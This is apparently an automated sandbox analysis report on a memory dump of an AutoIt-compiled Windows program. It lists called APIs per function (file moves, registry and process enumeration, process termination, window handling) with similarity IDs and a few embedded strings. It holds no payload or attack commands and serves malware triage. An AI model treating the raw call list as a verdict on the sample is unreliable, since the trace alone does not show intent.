                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3761583154-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00EA31DA
                                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00EE6A2B
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EE6A49
                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00EE6A62
                                                                                                                                    • Part of subcall function 00EE6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00EE6DBA
                                                                                                                                    • Part of subcall function 00EE6D6D: GetLastError.KERNEL32 ref: 00EE6DC5
                                                                                                                                    • Part of subcall function 00EE6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00EE6DD9
                                                                                                                                  • _wcscat.LIBCMT ref: 00EE6AA4
                                                                                                                                  • SHFileOperationW.SHELL32(?), ref: 00EE6B0C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                                                                                                                                  • String ID: \*.*
                                                                                                                                  • API String ID: 2323102230-1173974218
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __wcsnicmp
                                                                                                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                  • API String ID: 1038674560-2734436370
                                                                                                                                  APIs
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EE180D
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EE1833
                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00EE1836
                                                                                                                                  • SysAllocString.OLEAUT32 ref: 00EE1857
                                                                                                                                  • SysFreeString.OLEAUT32 ref: 00EE1860
                                                                                                                                  • StringFromGUID2.COMBASE(?,?,00000028), ref: 00EE187A
                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00EE1888
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3761583154-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EBC657
                                                                                                                                    • Part of subcall function 00EBC619: GetStockObject.GDI32(00000011), ref: 00EBC66B
                                                                                                                                    • Part of subcall function 00EBC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EBC675
                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F0A13B
                                                                                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F0A148
                                                                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F0A153
                                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F0A162
                                                                                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F0A16E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                  • String ID: Msctls_Progress32
                                                                                                                                  • API String ID: 1025951953-3636473452
                                                                                                                                  APIs
                                                                                                                                  • __getptd_noexit.LIBCMT ref: 00EC4C3E
                                                                                                                                    • Part of subcall function 00EC86B5: GetLastError.KERNEL32(?,00EC0127,00EC88A3,00EC4673,?,?,00EC0127,?,00EA125D,00000058,?,?), ref: 00EC86B7
                                                                                                                                    • Part of subcall function 00EC86B5: __calloc_crt.LIBCMT ref: 00EC86D8
                                                                                                                                    • Part of subcall function 00EC86B5: GetCurrentThreadId.KERNEL32 ref: 00EC8701
                                                                                                                                    • Part of subcall function 00EC86B5: SetLastError.KERNEL32(00000000,00EC0127,00EC88A3,00EC4673,?,?,00EC0127,?,00EA125D,00000058,?,?), ref: 00EC8719
                                                                                                                                  • CloseHandle.KERNEL32(?,?,00EC4C1D), ref: 00EC4C52
                                                                                                                                  • __freeptd.LIBCMT ref: 00EC4C59
                                                                                                                                  • RtlExitUserThread.NTDLL(00000000,?,00EC4C1D), ref: 00EC4C61
                                                                                                                                  • GetLastError.KERNEL32(?,?,00EC4C1D), ref: 00EC4C91
                                                                                                                                  • RtlExitUserThread.NTDLL(00000000,?,?,00EC4C1D), ref: 00EC4C98
                                                                                                                                  • __freefls@4.LIBCMT ref: 00EC4CB4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1445074172-0
                                                                                                                                  APIs
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00EBC6C0
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00EBC701
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00EBC729
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00EBC856
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00EBC86F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Rect$Client$Window$Screen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1296646539-0
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove$__itow__swprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3253778849-0
                                                                                                                                  APIs
                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00F01B09
                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00F01B17
                                                                                                                                  • __wsplitpath.LIBCMT ref: 00F01B45
                                                                                                                                    • Part of subcall function 00EC297D: __wsplitpath_helper.LIBCMT ref: 00EC29BD
                                                                                                                                  • _wcscat.LIBCMT ref: 00F01B5A
                                                                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00F01BD0
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00F01BE2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1380811348-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                    • Part of subcall function 00F03AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F02AA6,?,?), ref: 00F03B0E
                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F02FA0
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F02FE0
                                                                                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00F03003
                                                                                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F0302C
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F0306F
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00F0307C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4046560759-0
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscpy$_wcscat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2037614760-0
                                                                                                                                  APIs
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00EE2AF6
                                                                                                                                  • VariantClear.OLEAUT32(00000013), ref: 00EE2B68
                                                                                                                                  • VariantClear.OLEAUT32(00000000), ref: 00EE2BC3
                                                                                                                                  • _memmove.LIBCMT ref: 00EE2BED
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00EE2C3A
                                                                                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00EE2C68
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1101466143-0
                                                                                                                                  APIs
                                                                                                                                  • GetMenu.USER32(?), ref: 00F0833D
                                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 00F08374
                                                                                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F0839C
                                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 00F0840B
                                                                                                                                  • GetSubMenu.USER32(?,?), ref: 00F08419
                                                                                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 00F0846A
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$Item$CountMessagePostString
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 650687236-0
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00EE552E
                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EE5579
                                                                                                                                  • IsMenu.USER32(00000000), ref: 00EE5599
                                                                                                                                  • CreatePopupMenu.USER32 ref: 00EE55CD
                                                                                                                                  • GetMenuItemCount.USER32(000000FF), ref: 00EE562B
                                                                                                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00EE565C
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3311875123-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00EBAF8E
                                                                                                                                  • BeginPaint.USER32(?,?,?,?,?,?), ref: 00EBB1C1
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00EBB225
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00EBB242
                                                                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00EBB253
                                                                                                                                  • EndPaint.USER32(?,?), ref: 00EBB29D
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1827037458-0
                                                                                                                                  APIs
                                                                                                                                  • ShowWindow.USER32(00F61810,00000000,?,?,00F61810,00F61810,?,00F1E2D6), ref: 00F0E21B
                                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 00F0E23F
                                                                                                                                  • ShowWindow.USER32(00F61810,00000000,?,?,00F61810,00F61810,?,00F1E2D6), ref: 00F0E29F
                                                                                                                                  • ShowWindow.USER32(?,00000004,?,?,00F61810,00F61810,?,00F1E2D6), ref: 00F0E2B1
                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00F0E2D5
                                                                                                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00F0E2F8
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 642888154-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA84A6: __swprintf.LIBCMT ref: 00EA84E5
                                                                                                                                    • Part of subcall function 00EA84A6: __itow.LIBCMT ref: 00EA8519
                                                                                                                                    • Part of subcall function 00EA3BCF: _wcscpy.LIBCMT ref: 00EA3BF2
                                                                                                                                  • _wcstok.LIBCMT ref: 00EF1D6E
                                                                                                                                  • _wcscpy.LIBCMT ref: 00EF1DFD
                                                                                                                                  • _memset.LIBCMT ref: 00EF1E30
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                  • String ID: X
                                                                                                                                  • API String ID: 774024439-3081909835
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00EBB5EB
                                                                                                                                    • Part of subcall function 00EBB58B: SelectObject.GDI32(?,00000000), ref: 00EBB5FA
                                                                                                                                    • Part of subcall function 00EBB58B: BeginPath.GDI32(?), ref: 00EBB611
                                                                                                                                    • Part of subcall function 00EBB58B: SelectObject.GDI32(?,00000000), ref: 00EBB63B
                                                                                                                                  • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00F0E9F2
                                                                                                                                  • LineTo.GDI32(00000000,00000003,?), ref: 00F0EA06
                                                                                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F0EA14
                                                                                                                                  • LineTo.GDI32(00000000,00000000,?), ref: 00F0EA24
                                                                                                                                  • EndPath.GDI32(00000000), ref: 00F0EA34
                                                                                                                                  • StrokePath.GDI32(00000000), ref: 00F0EA44
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 43455801-0
                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(00000000), ref: 00EDEFB6
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00EDEFC7
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EDEFCE
                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00EDEFD6
                                                                                                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00EDEFED
                                                                                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 00EDEFFF
                                                                                                                                    • Part of subcall function 00EDA83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00EDA79D,00000000,00000000,?,00EDAB73), ref: 00EDB2CA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 603618608-0
                                                                                                                                  APIs
                                                                                                                                  • __init_pointers.LIBCMT ref: 00EC87D7
                                                                                                                                    • Part of subcall function 00EC1E5A: __initp_misc_winsig.LIBCMT ref: 00EC1E7E
                                                                                                                                    • Part of subcall function 00EC1E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00EC8BE1
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00EC8BF5
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00EC8C08
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00EC8C1B
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00EC8C2E
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00EC8C41
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00EC8C54
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00EC8C67
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00EC8C7A
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00EC8C8D
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00EC8CA0
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00EC8CB3
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00EC8CC6
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00EC8CD9
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00EC8CEC
                                                                                                                                    • Part of subcall function 00EC1E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00EC8CFF
                                                                                                                                  • __mtinitlocks.LIBCMT ref: 00EC87DC
                                                                                                                                    • Part of subcall function 00EC8AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(00F5AC68,00000FA0,?,?,00EC87E1,00EC6AFA,00F567D8,00000014), ref: 00EC8AD1
                                                                                                                                  • __mtterm.LIBCMT ref: 00EC87E5
                                                                                                                                    • Part of subcall function 00EC884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00EC89CF
                                                                                                                                    • Part of subcall function 00EC884D: _free.LIBCMT ref: 00EC89D6
                                                                                                                                    • Part of subcall function 00EC884D: RtlDeleteCriticalSection.NTDLL(00F5AC68), ref: 00EC89F8
                                                                                                                                  • __calloc_crt.LIBCMT ref: 00EC880A
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00EC8833
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2942034483-0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1423608774-0
                                                                                                                                  APIs
                                                                                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EA1898
                                                                                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00EA18A0
                                                                                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EA18AB
                                                                                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EA18B6
                                                                                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00EA18BE
                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EA18C6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Virtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4278518827-0
                                                                                                                                  APIs
                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00EE8504
                                                                                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00EE851A
                                                                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00EE8529
                                                                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EE8538
                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EE8542
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EE8549
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 839392675-0
                                                                                                                                  APIs
                                                                                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 00EEA330
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 00EEA341
                                                                                                                                  • TerminateThread.KERNEL32(?,000001F6,?,?,?,00F166D3,?,?,?,?,?,00EAE681), ref: 00EEA34E
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00F166D3,?,?,?,?,?,00EAE681), ref: 00EEA35B
                                                                                                                                    • Part of subcall function 00EE9CCE: CloseHandle.KERNEL32(?,?,00EEA368,?,?,?,00F166D3,?,?,?,?,?,00EAE681), ref: 00EE9CD8
                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00EEA36E
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 00EEA375
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3495660284-0
                                                                                                                                  APIs
                                                                                                                                  • _memmove.LIBCMT ref: 00EAC419
                                                                                                                                  • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00EE6653,?,?,00000000), ref: 00EAC495
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileRead_memmove
                                                                                                                                  • String ID: Sf
                                                                                                                                  • API String ID: 1325644223-3555655682
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EC010A: std::exception::exception.LIBCMT ref: 00EC013E
                                                                                                                                    • Part of subcall function 00EC010A: __CxxThrowException@8.LIBCMT ref: 00EC0153
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                    • Part of subcall function 00EABBD9: _memmove.LIBCMT ref: 00EABC33
                                                                                                                                  • __swprintf.LIBCMT ref: 00EBD98F
                                                                                                                                  Strings
                                                                                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00EBD832
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                  • API String ID: 1943609520-557222456
                                                                                                                                  APIs
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00EFB4A8
                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00EFB5B7
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00EFB73A
                                                                                                                                    • Part of subcall function 00EEA6F6: VariantInit.OLEAUT32(00000000), ref: 00EEA736
                                                                                                                                    • Part of subcall function 00EEA6F6: VariantCopy.OLEAUT32(?,?), ref: 00EEA73F
                                                                                                                                    • Part of subcall function 00EEA6F6: VariantClear.OLEAUT32(?), ref: 00EEA74B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
